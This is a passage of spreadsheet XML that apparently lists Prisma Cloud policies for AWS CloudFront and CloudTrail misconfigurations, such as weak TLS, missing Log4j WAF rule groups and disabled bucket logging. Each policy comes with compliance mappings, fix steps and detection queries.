      <c r="AA1587" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1587" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1587" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-958-CKV_AWS_305</t>
        </is>
      </c>
      <c r="AD1587" t="b">
        <v>1</v>
      </c>
      <c r="AE1587" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1587" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>e4475583-1d6b-4efe-8974-1bab376b3817</t>
        </is>
      </c>
      <c r="AI1587" t="inlineStr">
        <is>
          <t>ad2b6315-66d2-4e1c-9fb8-ec28349aeeee</t>
        </is>
      </c>
      <c r="AJ1587" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1587" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1588">
      <c r="A1588" t="inlineStr">
        <is>
          <t>MAS TRM 2021, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, CHC HITRUST CSF v.9.6.0, NIST SP 800-172, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, MITRE ATT&amp;CK v12, CRI Profile v1.2.1, PCI DSS v3.2.1, Copy of CIS Controls v8, ISO 27002:2022, ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, ISO/IEC 27017:2015, PCI DSS v4.0, CIS Controls v7.1, DORA, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, ISO/IEC 27018:2019, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CHC HITRUST CSF v.9.6.0, DORA, CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, SOC 2, NIST CSF, kfirdaus AWS Account-CS, CRI Profile v2.0, Fedramp (Moderate), ISO/IEC 27002:2013, MLPS 2.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, MAS TRM 2021, ISO/IEC 27002:2013, CIS Controls v8, CIS Controls v8.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, NIST SP 800-172, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1588" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1588" s="2" t="inlineStr"/>
      <c r="D1588" t="inlineStr"/>
      <c r="E1588" t="inlineStr"/>
      <c r="F1588" t="inlineStr"/>
      <c r="G1588" t="b">
        <v>1</v>
      </c>
      <c r="H15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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1588" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K1588" t="inlineStr">
        <is>
          <t>AWS CloudFront web distribution using insecure TLS version</t>
        </is>
      </c>
      <c r="L1588" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1588" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1588" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1588" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1588" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1588" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1588" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S1588" t="inlineStr"/>
      <c r="T1588" t="b">
        <v>0</v>
      </c>
      <c r="U1588" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1588" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W1588" t="inlineStr">
        <is>
          <t>This policy identifies AWS CloudFront web distributions which are configured with TLS versions for HTTPS communication between viewers and CloudFront. As a best practice, use recommended TLSv1.2_2021 as the minimum protocol version in your CloudFront distribution security policies.</t>
        </is>
      </c>
      <c r="X1588" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Navigate to CloudFront Distributions Dashboard
3. Click on the reported distribution
4. On 'General' tab, Click on 'Edit' button under 'Settings'
5. On 'Edit Distribution' page, Set 'Security Policy' to TLSv1.2_2021
6. Click on 'Save changes' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63</t>
        </is>
      </c>
      <c r="Y1588" t="inlineStr"/>
      <c r="Z1588" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = viewerCertificate.certificateSource does not contain cloudfront and viewerCertificate.minimumProtocolVersion does not equal TLSv1.2_2021
{"category":"General","resourceTypes":["aws_cloudfront_distribution","AWS::CloudFront::Distribution"]}</t>
        </is>
      </c>
      <c r="AA1588" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1588" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1588" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-346-CKV_AWS_174</t>
        </is>
      </c>
      <c r="AD1588" t="b">
        <v>1</v>
      </c>
      <c r="AE1588" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1588" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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8" t="inlineStr">
        <is>
          <t>45e37556-3d26-4cdb-8780-5b7fc5f60e01</t>
        </is>
      </c>
      <c r="AI1588" t="inlineStr">
        <is>
          <t>3eb5afe3-259d-48d0-8437-ec58668be0d3</t>
        </is>
      </c>
      <c r="AJ1588" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1588" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1589">
      <c r="A1589" t="inlineStr">
        <is>
          <t>CIS Controls v8, CIS Controls v8.1, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v4.0.12, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, FFIEC, PCI DSS v4.0, ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, NYDFS 23 CRR-NY 500.0, CIS Controls v7.1, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, kfirdaus AWS Account-CS, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ACSC Information Security Manual (ISM), PCI DSS v4.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, PCI DSS v4.0, ISO/IEC 27001:2022, NIST CSF v2.0, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), DORA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B1589" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1589" s="2" t="inlineStr"/>
      <c r="D1589" t="inlineStr"/>
      <c r="E1589" t="inlineStr"/>
      <c r="F1589" t="inlineStr"/>
      <c r="G1589" t="b">
        <v>1</v>
      </c>
      <c r="H15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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1589" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K1589" t="inlineStr">
        <is>
          <t>AWS CloudFront attached WAFv2 WebACL is not configured with AMR for Log4j Vulnerability</t>
        </is>
      </c>
      <c r="L1589" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1589" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1589" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1589" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1589" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1589" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1589" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S1589" t="inlineStr"/>
      <c r="T1589" t="b">
        <v>0</v>
      </c>
      <c r="U1589" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1589" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W1589" t="inlineStr">
        <is>
          <t>This policy identifies AWS CloudFront attached with WAFv2 WebACL which is not configured with AWS Managed Rules (AMR) for Log4j Vulnerability. As per the guidelines given by AWS, CloudFront attached with WAFv2 WebACL should be configured with AWS Managed Rules (AMR) AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList to protect from Log4j Vulnerability (CVE-2021-44228).
For more information please refer below URL,
https://aws.amazon.com/security/security-bulletins/AWS-2021-006/</t>
        </is>
      </c>
      <c r="X1589" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Go to the CloudFront Distributions Dashboard
3. Click on the reported web distribution
4. On 'General' tab, Click on 'Edit' button under 'Settings'
5. Note down the associated AWS WAF web ACL
6. Go to the noted WAF web ACL in AWS WAF &amp; Shield Service
7. Under 'Rules' tab click on 'Add rules' and select 'Add managed rule groups'
8. Under 'AWS managed rule groups' enable 'Anonymous IP list' and 'Known bad inputs'
9. Click on 'Add rules' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/aws-general-policies/bc-aws-general-47
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/aws-general-policies/bc-aws-general-47</t>
        </is>
      </c>
      <c r="Y1589" t="inlineStr"/>
      <c r="Z1589" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-cloudfront-list-distributions' AND json.rule = webACLId is not empty as X; config from cloud.resource where api.name = 'aws-waf-v2-global-web-acl-resource' AND json.rule =(webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesAnonymousIpList or webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesKnownBadInputsRuleSet) and NOT ( webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesAnonymousIpList and webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesKnownBadInputsRuleSet ) as Y; filter '$.Y.webACL.arn equals $.X.webACLId'; show X;
{"category":"General","resourceTypes":["aws_cloudfront_distribution","aws_wafv2_web_acl"]}</t>
        </is>
      </c>
      <c r="AA1589" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1589" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1589" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-827-CKV2_AWS_47</t>
        </is>
      </c>
      <c r="AD1589" t="b">
        <v>1</v>
      </c>
      <c r="AE1589" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1589" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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89" t="inlineStr">
        <is>
          <t>95f10340-d649-46d2-a8c0-362a45dae8da</t>
        </is>
      </c>
      <c r="AI1589" t="inlineStr">
        <is>
          <t>c8bbb7a9-c13a-482b-a0f3-96b4f5ff2ce0</t>
        </is>
      </c>
      <c r="AJ1589" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1589" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1590">
      <c r="A1590" t="inlineStr"/>
      <c r="B1590" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1590" s="2" t="inlineStr"/>
      <c r="D1590" t="inlineStr"/>
      <c r="E1590" t="inlineStr"/>
      <c r="F1590" t="inlineStr"/>
      <c r="G1590" t="b">
        <v>0</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1590" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K1590" t="inlineStr">
        <is>
          <t>rannaladasu-test-policy</t>
        </is>
      </c>
      <c r="L1590" t="inlineStr"/>
      <c r="M1590" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1590" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1590" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1590" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1590" t="inlineStr"/>
      <c r="R1590" t="inlineStr"/>
      <c r="S1590" t="inlineStr"/>
      <c r="T1590" t="b">
        <v>0</v>
      </c>
      <c r="U1590" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1590" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W1590" t="inlineStr"/>
      <c r="X1590" t="inlineStr">
        <is>
          <t>Build Recommendation: 
IaC:</t>
        </is>
      </c>
      <c r="Y1590" t="inlineStr"/>
      <c r="Z1590" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudtrail-describe-trails' AND json.rule = 'cloudWatchLogsRoleArn equals null or cloudWatchLogsRoleArn does not exist'</t>
        </is>
      </c>
      <c r="AA1590" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1590" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1590" t="inlineStr"/>
      <c r="AD1590" t="b">
        <v>0</v>
      </c>
      <c r="AE1590" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1590" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>b8052c93-9a73-4bd9-a991-4c7a0fe9b4f9</t>
        </is>
      </c>
      <c r="AI1590" t="inlineStr">
        <is>
          <t>0b31c243-bf8c-4b92-a7bc-f0cc195df5a2</t>
        </is>
      </c>
      <c r="AJ1590" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1590" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1591">
      <c r="A1591" t="inlineStr">
        <is>
          <t>RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), NIST CSF v2.0, jbrox - GDPR, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, ISO 27002:2022, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v12, CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], NYDFS 23 CRR-NY 500.0, CSA CCM v3.0.1, SOC 2, PCI DSS v3.2.1, CIS Controls v8, GDPR, kfirdaus AWS Account-CS, Microsoft Cloud Security Benchmark v1, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, wells fargo CIS v1.5.0 (AWS) - Level 1, NIST SP 800-172, Copy of CIS Controls v8, TX-RAMP Level 2, CSA CCM v4.0.12, CIS v1.5.0 (AWS) - Level 1, CIS v1.4.0 (AWS), NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, CIS v2.0.0 (AWS) - Level 1, MTSBv2_AWS, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, CIS Controls v8, FFIEC, CIS Controls v8.1, CRI Profile v2.0, MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, PCI DSS v4.0, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, PIPEDA, NIST CSF, kashan ACSC Information Security Manual (ISM), Fedramp (Moderate), NIST 800-53 Rev4, CIS v3.0.0 (AWS) Level 1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, CRI Profile v2.0, CIS v1.3.0 (AWS), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, PCI DSS v4.0, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Telecommunications Security Act - TSA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, CIS v1.2.0 (AWS), NIST 800-171 Rev1, CHC HITRUST CSF v.9.6.0, HITRUST CSF v9.3 [Deprecated], NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B1591" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1591" s="2" t="inlineStr"/>
      <c r="D1591" t="n">
        <v>0</v>
      </c>
      <c r="E1591" t="n">
        <v>0</v>
      </c>
      <c r="F1591" t="n">
        <v>15</v>
      </c>
      <c r="G1591" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1591" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K1591" t="inlineStr">
        <is>
          <t>AWS S3 CloudTrail bucket for which access logging is disabled</t>
        </is>
      </c>
      <c r="L1591" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1591" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1591" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1591" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1591" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1591" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1591" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1591" t="inlineStr">
        <is>
          <t>CIS</t>
        </is>
      </c>
      <c r="T1591" t="b">
        <v>0</v>
      </c>
      <c r="U1591" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1591" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W1591" t="inlineStr">
        <is>
          <t>This policy identifies S3 CloudTrail buckets for which access is disabled. S3 Bucket access logging generates access records for each request made to your S3 bucket. An access log record contains information such as the request type, the resources specified in the request worked, and the time and date the request was processed. It is recommended that bucket access logging be enabled on the CloudTrail S3 bucket.</t>
        </is>
      </c>
      <c r="X1591" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console and navigate to the 'S3' service.
2. Click on the the S3 bucket that was reported.
3. Click on the 'Properties' tab.
4. Under the 'Server access logging' section, select 'Enable' option and provide s3 bucket of your choice in the 'Target bucket'
5. Click on 'Save Changes'</t>
        </is>
      </c>
      <c r="Y1591" t="inlineStr"/>
      <c r="Z1591" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-cloudtrail-describe-trails' as X; config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' AND json.rule = loggingConfiguration.targetBucket does not exist as Y; filter '$.X.s3BucketName equals $.Y.bucketName'; show Y;</t>
        </is>
      </c>
      <c r="AA1591" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1591" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1591" t="inlineStr">
        <is>
          <t>PC-AWS-S3-2</t>
        </is>
      </c>
      <c r="AD1591" t="b">
        <v>1</v>
      </c>
      <c r="AE1591" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1591" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>3f141560-9cfc-412a-96cc-2768edfd23ad</t>
        </is>
      </c>
      <c r="AI1591" t="inlineStr">
        <is>
          <t>fa8ef7ce-d60d-4b24-80cb-d86cb281c7c1</t>
        </is>
      </c>
      <c r="AJ1591" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1591" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1592">
      <c r="A1592" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, jneytchev-fedramp-low, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, NIST 800-53 Rev4, MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Fedramp (Low), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Fedramp (Moderate), CyberSecurity Law of the People's Republic of China, TX-RAMP Level 1, NIST SP 800-171 Revision 2, CDC NIST 800-53 Rev4, TX-RAMP Level 2, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CIS Controls v8, CSA CCM v.4.0.1, CyberSecurity Law of the People's Republic of China, kfirdaus AWS Account-CS, MLPS 2.0 (Level 3), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CSA CCM v.4.0.1, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, MLPS 2.0, APRA (CPS 234) Information Security, HIPAA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], PIPEDA, NIST CSF, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, MAS TRM 2021, CCPA 2018, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), DORA, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, MITRE 